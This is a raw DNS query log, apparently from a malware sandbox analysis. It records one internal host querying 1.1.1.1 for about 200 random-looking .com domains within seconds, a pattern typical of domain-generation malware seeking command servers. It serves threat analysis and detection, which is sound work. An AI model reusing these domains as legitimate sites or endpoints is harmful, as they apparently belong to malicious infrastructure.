                                                                                                                                                                                                              Nov 11, 2024 18:33:25.685691118 CET192.168.2.81.1.1.10xf637Standard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.685935974 CET192.168.2.81.1.1.10x7280Standard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.687643051 CET192.168.2.81.1.1.10x23c8Standard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.687817097 CET192.168.2.81.1.1.10x914dStandard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.689444065 CET192.168.2.81.1.1.10x2ee5Standard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.689623117 CET192.168.2.81.1.1.10x8caaStandard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.689774036 CET192.168.2.81.1.1.10x4bbfStandard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.689934015 CET192.168.2.81.1.1.10x70aStandard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.692393064 CET192.168.2.81.1.1.10x6b92Standard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.693861961 CET192.168.2.81.1.1.10x1949Standard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.694077015 CET192.168.2.81.1.1.10x7904Standard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.696432114 CET192.168.2.81.1.1.10x92ddStandard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.697576046 CET192.168.2.81.1.1.10x906bStandard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.698055983 CET192.168.2.81.1.1.10x8074Standard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.698970079 CET192.168.2.81.1.1.10x7d78Standard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.711354017 CET192.168.2.81.1.1.10xa74aStandard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.714751959 CET192.168.2.81.1.1.10x3f98Standard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.714948893 CET192.168.2.81.1.1.10x782Standard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.715107918 CET192.168.2.81.1.1.10x6ba4Standard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.715325117 CET192.168.2.81.1.1.10x9afcStandard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.715325117 CET192.168.2.81.1.1.10x8b4eStandard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.715503931 CET192.168.2.81.1.1.10x6825Standard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.715538025 CET192.168.2.81.1.1.10xd036Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.715764046 CET192.168.2.81.1.1.10xb8ddStandard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.715929985 CET192.168.2.81.1.1.10x1fffStandard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.716123104 CET192.168.2.81.1.1.10x1842Standard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.716232061 CET192.168.2.81.1.1.10x3946Standard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.716439009 CET192.168.2.81.1.1.10x93c2Standard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.723814964 CET192.168.2.81.1.1.10xf6fcStandard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.723872900 CET192.168.2.81.1.1.10xa600Standard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.725732088 CET192.168.2.81.1.1.10xadabStandard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.727200031 CET192.168.2.81.1.1.10x7dd0Standard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.731172085 CET192.168.2.81.1.1.10xfd2aStandard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.737917900 CET192.168.2.81.1.1.10xce43Standard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.742041111 CET192.168.2.81.1.1.10x25cfStandard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.743802071 CET192.168.2.81.1.1.10xce7eStandard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.748253107 CET192.168.2.81.1.1.10xb797Standard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.806140900 CET192.168.2.81.1.1.10xa8ceStandard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.806360006 CET192.168.2.81.1.1.10x6c96Standard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.806551933 CET192.168.2.81.1.1.10xbcebStandard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.806732893 CET192.168.2.81.1.1.10x184Standard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.806910038 CET192.168.2.81.1.1.10xb28dStandard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.807075977 CET192.168.2.81.1.1.10xc03aStandard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.807219982 CET192.168.2.81.1.1.10x5d00Standard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.807368994 CET192.168.2.81.1.1.10xe544Standard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.807506084 CET192.168.2.81.1.1.10xb0c4Standard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.963701963 CET192.168.2.81.1.1.10xbc0cStandard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.967542887 CET192.168.2.81.1.1.10x7342Standard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.986799002 CET192.168.2.81.1.1.10x4e4cStandard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.011049032 CET192.168.2.81.1.1.10x7a52Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.011684895 CET192.168.2.81.1.1.10x3868Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.813764095 CET192.168.2.81.1.1.10x1d7cStandard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.814393044 CET192.168.2.81.1.1.10x659Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.815361977 CET192.168.2.81.1.1.10x60e0Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.819602966 CET192.168.2.81.1.1.10x2bf0Standard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.820547104 CET192.168.2.81.1.1.10xa9c3Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.828279972 CET192.168.2.81.1.1.10xb6b3Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.851202965 CET192.168.2.81.1.1.10xb4d7Standard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.860981941 CET192.168.2.81.1.1.10xf82eStandard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.865416050 CET192.168.2.81.1.1.10x147cStandard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.866477013 CET192.168.2.81.1.1.10xcd92Standard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.866692066 CET192.168.2.81.1.1.10x25fcStandard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.867747068 CET192.168.2.81.1.1.10xe378Standard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.868539095 CET192.168.2.81.1.1.10xeb2eStandard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.870553970 CET192.168.2.81.1.1.10xb0ceStandard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.872066975 CET192.168.2.81.1.1.10xbe7Standard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.872386932 CET192.168.2.81.1.1.10x7f07Standard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.872724056 CET192.168.2.81.1.1.10x8629Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.878649950 CET192.168.2.81.1.1.10x6a85Standard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.879074097 CET192.168.2.81.1.1.10xadb2Standard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.879461050 CET192.168.2.81.1.1.10x83daStandard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.880053043 CET192.168.2.81.1.1.10xdd86Standard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.880711079 CET192.168.2.81.1.1.10xae33Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.881325006 CET192.168.2.81.1.1.10xb1beStandard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.881342888 CET192.168.2.81.1.1.10xa857Standard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.881833076 CET192.168.2.81.1.1.10x392eStandard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.882101059 CET192.168.2.81.1.1.10x97eStandard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.882353067 CET192.168.2.81.1.1.10xed71Standard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.901201010 CET192.168.2.81.1.1.10x67ccStandard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.902257919 CET192.168.2.81.1.1.10x7ac6Standard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.902420998 CET192.168.2.81.1.1.10xd13Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.903377056 CET192.168.2.81.1.1.10x5c90Standard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.903531075 CET192.168.2.81.1.1.10xaf78Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.905250072 CET192.168.2.81.1.1.10xb534Standard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.905535936 CET192.168.2.81.1.1.10x124Standard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.905750036 CET192.168.2.81.1.1.10x3617Standard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.905908108 CET192.168.2.81.1.1.10x3ccStandard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.906054974 CET192.168.2.81.1.1.10x10d2Standard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.906084061 CET192.168.2.81.1.1.10xb62aStandard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.908437967 CET192.168.2.81.1.1.10xf7ebStandard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.908629894 CET192.168.2.81.1.1.10xf47cStandard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.908859968 CET192.168.2.81.1.1.10xf3d8Standard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909099102 CET192.168.2.81.1.1.10x9a12Standard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909383059 CET192.168.2.81.1.1.10xd5dfStandard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909431934 CET192.168.2.81.1.1.10x8ccStandard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909615993 CET192.168.2.81.1.1.10x38eeStandard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909770966 CET192.168.2.81.1.1.10xbf6eStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909837961 CET192.168.2.81.1.1.10x2fd3Standard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909956932 CET192.168.2.81.1.1.10x8d1aStandard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910140038 CET192.168.2.81.1.1.10xe71eStandard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910172939 CET192.168.2.81.1.1.10x8082Standard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910361052 CET192.168.2.81.1.1.10x9ccdStandard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910444021 CET192.168.2.81.1.1.10xf887Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910558939 CET192.168.2.81.1.1.10x988cStandard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910847902 CET192.168.2.81.1.1.10xba65Standard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.916373014 CET192.168.2.81.1.1.10x54a3Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.916466951 CET192.168.2.81.1.1.10xeb9bStandard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.916594028 CET192.168.2.81.1.1.10xa975Standard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.916707039 CET192.168.2.81.1.1.10x214Standard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.917361975 CET192.168.2.81.1.1.10xa84dStandard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.918004990 CET192.168.2.81.1.1.10x2b72Standard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.918296099 CET192.168.2.81.1.1.10xbcb5Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.918739080 CET192.168.2.81.1.1.10x967eStandard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.918915987 CET192.168.2.81.1.1.10x9ad8Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.934840918 CET192.168.2.81.1.1.10x10b9Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.828438997 CET192.168.2.81.1.1.10x3c4Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.829011917 CET192.168.2.81.1.1.10x2979Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.832374096 CET192.168.2.81.1.1.10x7176Standard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.833671093 CET192.168.2.81.1.1.10x2484Standard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.848376989 CET192.168.2.81.1.1.10x3109Standard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.882554054 CET192.168.2.81.1.1.10x6e4bStandard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.883833885 CET192.168.2.81.1.1.10x2c00Standard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.889934063 CET192.168.2.81.1.1.10xaab0Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.904782057 CET192.168.2.81.1.1.10xb80bStandard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.905771017 CET192.168.2.81.1.1.10x502Standard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.931539059 CET192.168.2.81.1.1.10xdac4Standard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.944694042 CET192.168.2.81.1.1.10xd578Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.959070921 CET192.168.2.81.1.1.10xab88Standard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.960376024 CET192.168.2.81.1.1.10x32Standard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.962456942 CET192.168.2.81.1.1.10xba1eStandard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.962780952 CET192.168.2.81.1.1.10x96cbStandard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.966007948 CET192.168.2.81.1.1.10x36c5Standard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.967757940 CET192.168.2.81.1.1.10x8072Standard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.970180988 CET192.168.2.81.1.1.10xea4dStandard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.971553087 CET192.168.2.81.1.1.10x44e7Standard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.973880053 CET192.168.2.81.1.1.10xffc5Standard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.975158930 CET192.168.2.81.1.1.10x1a49Standard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.976653099 CET192.168.2.81.1.1.10xd8a8Standard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.978796959 CET192.168.2.81.1.1.10xb6d2Standard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.978924036 CET192.168.2.81.1.1.10xfa9eStandard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.983283997 CET192.168.2.81.1.1.10xaf27Standard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.983488083 CET192.168.2.81.1.1.10x2fc7Standard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.987891912 CET192.168.2.81.1.1.10x855bStandard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.988720894 CET192.168.2.81.1.1.10xb3f8Standard query (0)lygyvuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.988909960 CET192.168.2.81.1.1.10x1060Standard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.989767075 CET192.168.2.81.1.1.10x5a95Standard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.989948988 CET192.168.2.81.1.1.10xbc18Standard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.990113020 CET192.168.2.81.1.1.10xfa7Standard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.990264893 CET192.168.2.81.1.1.10x352bStandard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.991786957 CET192.168.2.81.1.1.10x33a0Standard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.993551970 CET192.168.2.81.1.1.10xcdf6Standard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.993942976 CET192.168.2.81.1.1.10x6d8cStandard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.997854948 CET192.168.2.81.1.1.10xbc7eStandard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.998071909 CET192.168.2.81.1.1.10xd67fStandard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.998701096 CET192.168.2.81.1.1.10x292cStandard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.999448061 CET192.168.2.81.1.1.10x5a54Standard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.003320932 CET192.168.2.81.1.1.10x391Standard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.004590988 CET192.168.2.81.1.1.10x67b9Standard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.004848003 CET192.168.2.81.1.1.10x3b3fStandard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.005038977 CET192.168.2.81.1.1.10xfc90Standard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.005284071 CET192.168.2.81.1.1.10x9a01Standard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.005429983 CET192.168.2.81.1.1.10x262cStandard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.005568981 CET192.168.2.81.1.1.10x6c1eStandard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.008229017 CET192.168.2.81.1.1.10xb0e9Standard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.008910894 CET192.168.2.81.1.1.10x4bb9Standard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.009792089 CET192.168.2.81.1.1.10x690Standard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.040740967 CET192.168.2.81.1.1.10x7973Standard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.041019917 CET192.168.2.81.1.1.10xba70Standard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.041122913 CET192.168.2.81.1.1.10x7155Standard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.041307926 CET192.168.2.81.1.1.10xc43fStandard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.042016983 CET192.168.2.81.1.1.10x1a4eStandard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.042187929 CET192.168.2.81.1.1.10xbf68Standard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.042334080 CET192.168.2.81.1.1.10x648Standard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.042471886 CET192.168.2.81.1.1.10x99b9Standard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.042483091 CET192.168.2.81.1.1.10x1e1cStandard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.044735909 CET192.168.2.81.1.1.10x30c7Standard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.045269966 CET192.168.2.81.1.1.10x62c2Standard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.058533907 CET192.168.2.81.1.1.10x77eeStandard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:28.058864117 CET192.168.2.81.1.1.10x92daStandard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.341830969 CET192.168.2.81.1.1.10x4a83Standard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.417386055 CET192.168.2.81.1.1.10x9497Standard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.423038006 CET192.168.2.81.1.1.10x642bStandard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:29.423837900 CET192.168.2.81.1.1.10xee63Standard query (0)vonymoc.comA (IP address)IN (0x0001)false
